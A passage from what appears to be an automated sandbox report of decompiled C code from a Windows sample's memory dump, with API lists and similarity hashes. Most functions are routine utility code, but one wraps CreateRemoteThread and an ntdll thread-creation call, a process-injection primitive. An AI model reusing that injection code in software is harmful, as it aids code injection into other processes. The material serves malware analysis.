                                                                                                                				if(_t2 != 0) {
                                                                                                                					_push(_t2);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t3 =  *0x41c45c;
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_push(_t3);
                                                                                                                					L0040B272();
                                                                                                                				}
                                                                                                                				_t4 =  *0x41c464;
                                                                                                                				if(_t4 != 0) {
                                                                                                                					_push(_t4);
                                                                                                                					L0040B272();
                                                                                                                					return _t4;
                                                                                                                				}
                                                                                                                				return _t4;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??3@
                                                                                                                • String ID:
                                                                                                                • API String ID: 613200358-0
                                                                                                                • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				void* _v16;
                                                                                                                				wchar_t* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t39;
                                                                                                                				wchar_t* _t41;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t48;
                                                                                                                				wchar_t* _t53;
                                                                                                                				wchar_t* _t62;
                                                                                                                				void* _t66;
                                                                                                                				intOrPtr* _t68;
                                                                                                                				void* _t70;
                                                                                                                				wchar_t* _t75;
                                                                                                                				wchar_t* _t79;
                                                                                                                
                                                                                                                				_t66 = __ebx;
                                                                                                                				_t75 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
                                                                                                                						_t68 = _a8;
                                                                                                                						if(_t68 != _t75) {
                                                                                                                							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
                                                                                                                						} else {
                                                                                                                							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
                                                                                                                						}
                                                                                                                						_t41 = wcschr(_t79, 0x2c);
                                                                                                                						_pop(_t70);
                                                                                                                						if(_t41 != 0) {
                                                                                                                							L8:
                                                                                                                							_v20 = _t75;
                                                                                                                							_v28 = _t75;
                                                                                                                							_v36 = _t75;
                                                                                                                							_v24 = 0x100;
                                                                                                                							_v32 = 1;
                                                                                                                							_v16 = 0x22;
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							while(1) {
                                                                                                                								_t45 =  *_t79 & 0x0000ffff;
                                                                                                                								__eflags = _t45;
                                                                                                                								_v12 = _t45;
                                                                                                                								_t77 =  &_v36;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								__eflags = _t45 - 0x22;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( &_v12);
                                                                                                                									_t48 = 1;
                                                                                                                									__eflags = 1;
                                                                                                                								} else {
                                                                                                                									_push(L"\"\"");
                                                                                                                									_t48 = _t45 | 0xffffffff;
                                                                                                                								}
                                                                                                                								E0040565D(_t48, _t70, _t77, __eflags);
                                                                                                                								_t79 =  &(_t79[0]);
                                                                                                                								__eflags = _t79;
                                                                                                                							}
                                                                                                                							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
                                                                                                                							_t53 = _v20;
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 == 0) {
                                                                                                                								_t53 = 0x40c4e8;
                                                                                                                							}
                                                                                                                							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
                                                                                                                							_t75 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_t62 = wcschr(_t79, 0x22);
                                                                                                                							_pop(_t70);
                                                                                                                							if(_t62 != 0) {
                                                                                                                								goto L8;
                                                                                                                							} else {
                                                                                                                								E00407343(_t66, _a4, _t79);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
                                                                                                                							E00407343(_t66, _a4, ",");
                                                                                                                						}
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t66, _a4, L"\r\n");
                                                                                                                			}
























                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 004073A4
                                                                                                                • wcschr.MSVCRT ref: 004073B2
                                                                                                                  • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                  • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                                                                				void* _v8;
                                                                                                                				char _v12;
                                                                                                                				char* _v20;
                                                                                                                				long _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char* _v36;
                                                                                                                				signed int _v40;
                                                                                                                				void _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v52;
                                                                                                                				struct _OSVERSIONINFOW _v328;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t40;
                                                                                                                				intOrPtr* _t44;
                                                                                                                				void* _t49;
                                                                                                                				struct HINSTANCE__** _t54;
                                                                                                                				signed int _t55;
                                                                                                                
                                                                                                                				_t54 = __eax;
                                                                                                                				_v328.dwOSVersionInfoSize = 0x114;
                                                                                                                				GetVersionExW( &_v328);
                                                                                                                				if(_v328.dwMajorVersion < 6) {
                                                                                                                					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                                                                				}
                                                                                                                				E0040A1EF(_t54);
                                                                                                                				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                				if(_t44 != 0) {
                                                                                                                					_t55 = 8;
                                                                                                                					memset( &_v44, 0, _t55 << 2);
                                                                                                                					_v12 = 0;
                                                                                                                					asm("stosd");
                                                                                                                					_v36 =  &_v12;
                                                                                                                					_v20 =  &_v52;
                                                                                                                					_v48 = 0x24;
                                                                                                                					_v44 = 0x10003;
                                                                                                                					_v40 = _t55;
                                                                                                                					_v28 = 0x10004;
                                                                                                                					_v24 = 4;
                                                                                                                					_a16 = 0;
                                                                                                                					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					return  !( ~_t40) & _a16;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                                                • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                  • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                  • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                • String ID: $
                                                                                                                • API String ID: 283512611-3993045852
                                                                                                                • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				char _v80;
                                                                                                                				signed short _v65616;
                                                                                                                				void* _t27;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t34;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                
                                                                                                                				_t51 = __esi;
                                                                                                                				E0040B550(0x1004c, __ecx);
                                                                                                                				_t39 = 0;
                                                                                                                				_push(0);
                                                                                                                				_push( &_v8);
                                                                                                                				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
                                                                                                                				_push(L"Lines");
                                                                                                                				_t27 =  *((intOrPtr*)( *__esi))();
                                                                                                                				if(_v8 > 0) {
                                                                                                                					do {
                                                                                                                						_t6 = _t39 + 1; // 0x1
                                                                                                                						_t28 = _t6;
                                                                                                                						_push(_t28);
                                                                                                                						_push(L"Line%d");
                                                                                                                						_v12 = _t28;
                                                                                                                						_push(0x1f);
                                                                                                                						_push( &_v80);
                                                                                                                						L0040B1EC();
                                                                                                                						_t52 = _t52 + 0x10;
                                                                                                                						_push(0x7fff);
                                                                                                                						_push(0x40c4e8);
                                                                                                                						if( *((intOrPtr*)(_t51 + 4)) == 0) {
                                                                                                                							_v65616 = _v65616 & 0x00000000;
                                                                                                                							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
                                                                                                                							_t34 = E004054DF(_a4, _t51,  &_v65616);
                                                                                                                						} else {
                                                                                                                							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
                                                                                                                						}
                                                                                                                						_t39 = _v12;
                                                                                                                					} while (_t39 < _v8);
                                                                                                                					return _t34;
                                                                                                                				}
                                                                                                                				return _t27;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: Line%d$Lines
                                                                                                                • API String ID: 3988819677-2790224864
                                                                                                                • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 70%
                                                                                                                			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v26;
                                                                                                                				void _v28;
                                                                                                                				void* _t24;
                                                                                                                				void* _t25;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t38;
                                                                                                                				signed int _t42;
                                                                                                                				void* _t44;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t24 = _a12;
                                                                                                                				_t45 = _t44 - 0x18;
                                                                                                                				_t42 = 0;
                                                                                                                				 *_t24 = 0;
                                                                                                                				if(_a8 <= 0) {
                                                                                                                					_t25 = 0;
                                                                                                                				} else {
                                                                                                                					_t38 = 0;
                                                                                                                					_t35 = 0;
                                                                                                                					if(_a8 > 0) {
                                                                                                                						_v8 = _t24;
                                                                                                                						while(1) {
                                                                                                                							_v28 = _v28 & 0x00000000;
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosd");
                                                                                                                							asm("stosw");
                                                                                                                							_push( *(_t35 + _a4) & 0x000000ff);
                                                                                                                							_push(L"%2.2X ");
                                                                                                                							_push(0xa);
                                                                                                                							_push( &_v28);
                                                                                                                							L0040B1EC();
                                                                                                                							_t38 = _t42;
                                                                                                                							memcpy(_v8,  &_v28, 6);
                                                                                                                							_t13 = _t42 + 3; // 0x3
                                                                                                                							_t45 = _t45 + 0x1c;
                                                                                                                							if(_t13 >= 0x2000) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_v8 = _v8 + 6;
                                                                                                                							_t35 = _t35 + 1;
                                                                                                                							_t42 = _t42 + 3;
                                                                                                                							if(_t35 < _a8) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						_t24 = _a12;
                                                                                                                					}
                                                                                                                					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
                                                                                                                					_t25 = 1;
                                                                                                                				}
                                                                                                                				return _t25;
                                                                                                                			}













                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                                                • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                                                • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 43%
                                                                                                                			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _t22;
                                                                                                                				signed int _t30;
                                                                                                                				signed int _t34;
                                                                                                                				void* _t35;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t35 = __esi;
                                                                                                                				_t34 = 0;
                                                                                                                				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
                                                                                                                					do {
                                                                                                                						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
                                                                                                                						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
                                                                                                                						L0040B1EC();
                                                                                                                						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
                                                                                                                						_push( &_v44);
                                                                                                                						_push(0x2000);
                                                                                                                						_push( *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						L0040B1EC();
                                                                                                                						_t36 = _t36 + 0x24;
                                                                                                                						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
                                                                                                                						_t34 = _t34 + 1;
                                                                                                                					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
                                                                                                                				}
                                                                                                                				return E00407343(_t35, _a4, L"\r\n");
                                                                                                                			}









                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction ID: ecb877ded915dbad8d5af0e436ed4e240226c92ce5a1c47ab2288d53f8dcf9da
                                                                                                                • Opcode Fuzzy Hash: 8b20a529ff37d77b79effa085cf49c3b2d19e50ebfb67170c6dd6cfdd11deb7b
                                                                                                                • Instruction Fuzzy Hash: BC01B931600704AFD7109F69CC82D5A77ADFF48304B004439FD86B7292D635F911DBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v44;
                                                                                                                				intOrPtr _v48;
                                                                                                                				wchar_t* _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				intOrPtr _v64;
                                                                                                                				intOrPtr _v68;
                                                                                                                				intOrPtr _v76;
                                                                                                                				struct tagOFNA _v80;
                                                                                                                
                                                                                                                				_v76 = __eax;
                                                                                                                				_v68 = _a4;
                                                                                                                				_v64 = 0;
                                                                                                                				_v44 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = _a8;
                                                                                                                				_v20 = _a12;
                                                                                                                				_v80 = 0x4c;
                                                                                                                				_v56 = 1;
                                                                                                                				_v52 = __esi;
                                                                                                                				_v48 = 0x104;
                                                                                                                				_v28 = 0x81804;
                                                                                                                				if(GetOpenFileNameW( &_v80) == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					wcscpy(__esi, _v52);
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                			}















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileNameOpenwcscpy
                                                                                                                • String ID: L
                                                                                                                • API String ID: 3246554996-2909332022
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				void* __esi;
                                                                                                                				_Unknown_base(*)()* _t10;
                                                                                                                				void* _t12;
                                                                                                                				struct HINSTANCE__** _t13;
                                                                                                                
                                                                                                                				_t13 = __eax;
                                                                                                                				_t12 = 0;
                                                                                                                				if(E00408F72(__eax) != 0) {
                                                                                                                					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
                                                                                                                					if(_t10 != 0) {
                                                                                                                						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: LookupAccountSidW$Y@
                                                                                                                • API String ID: 190572456-2352570548
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040AD85(intOrPtr _a4) {
                                                                                                                				_Unknown_base(*)()* _t3;
                                                                                                                				void* _t7;
                                                                                                                				struct HINSTANCE__* _t8;
                                                                                                                				char** _t9;
                                                                                                                
                                                                                                                				_t7 = 0;
                                                                                                                				_t8 = E00405436(L"shlwapi.dll");
                                                                                                                				 *_t9 = "SHAutoComplete";
                                                                                                                				_t3 = GetProcAddress(_t8, ??);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t8);
                                                                                                                				return _t7;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeProcmemsetwcscat
                                                                                                                • String ID: shlwapi.dll
                                                                                                                • API String ID: 4092907564-3792422438
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00406597(wchar_t* __esi) {
                                                                                                                				wchar_t* _t2;
                                                                                                                				wchar_t* _t6;
                                                                                                                
                                                                                                                				_t6 = __esi;
                                                                                                                				E00404AD9(__esi);
                                                                                                                				_t2 = wcsrchr(__esi, 0x2e);
                                                                                                                				if(_t2 != 0) {
                                                                                                                					 *_t2 =  *_t2 & 0x00000000;
                                                                                                                				}
                                                                                                                				return wcscat(_t6, L"_lng.ini");
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 004065A0
                                                                                                                • wcscat.MSVCRT ref: 004065B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AC52() {
                                                                                                                				struct HINSTANCE__* _t1;
                                                                                                                				_Unknown_base(*)()* _t2;
                                                                                                                
                                                                                                                				if( *0x4101c4 == 0) {
                                                                                                                					_t1 = E00405436(L"shell32.dll");
                                                                                                                					 *0x4101c4 = _t1;
                                                                                                                					if(_t1 != 0) {
                                                                                                                						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
                                                                                                                						 *0x4101c0 = _t2;
                                                                                                                						return _t2;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t1;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 946536540-880857682
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00406670(char** __esi, void* __eflags) {
                                                                                                                				char* _t30;
                                                                                                                				char** _t39;
                                                                                                                
                                                                                                                				_t39 = __esi;
                                                                                                                				 *__esi = "cf@";
